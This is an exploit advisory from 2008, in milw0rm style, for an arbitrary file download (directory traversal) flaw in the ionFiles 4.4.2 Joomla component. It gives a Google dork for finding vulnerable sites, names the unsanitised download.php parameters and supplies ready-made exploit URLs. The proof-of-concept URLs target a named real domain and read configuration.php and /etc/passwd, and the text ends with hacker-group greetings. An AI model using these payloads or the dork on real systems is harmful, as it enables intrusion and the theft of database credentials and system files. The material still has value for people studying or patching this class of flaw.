40 lines
No EOL
1.9 KiB
Text
40 lines
No EOL
1.9 KiB
Text
[o]------------------------------------------------------------------------------------[x]
|
|
| Arbitrary File Download Vulnerability |
|
|
[o]------------------------------------------------------------------------------------[o]
|
|
| Software : ionFiles 4.4.2 Component for Joomla! CMS |
|
|
| Vendor : http://forum.codecall.net/ |
|
|
| Date : 23 October 2008 |
|
|
| Author : Vrs-hCk |
|
|
| Contact : d00r[at]telkom[dot]net |
|
|
[o]------------------------------------------------------------------------------------[o]
|
|
|
|
[»] Google Dork
|
|
|
|
inurl:com_ionfiles
|
|
|
|
[»] Vulnerable
|
|
|
|
./download.php
|
|
|
|
Line 32: $file = $_GET['file'];
|
|
Line 33: $download = $_GET['download'];
|
|
Line 66 - 91
|
|
|
|
[»] Exploit
|
|
|
|
http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
|
|
|
|
[»] Proof of Concept
|
|
|
|
http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
|
|
http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
|
|
|
|
[o]------------------------------------------------------------------------------------[x]
|
|
| Greetz |
|
|
[o]------------------------------------------------------------------------------------[o]
|
|
| All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org |
|
|
| Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius, |
|
|
| Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :)) |
|
|
[o]------------------------------------------------------------------------------------[o]
|
|
|
|
# milw0rm.com [2008-10-22] |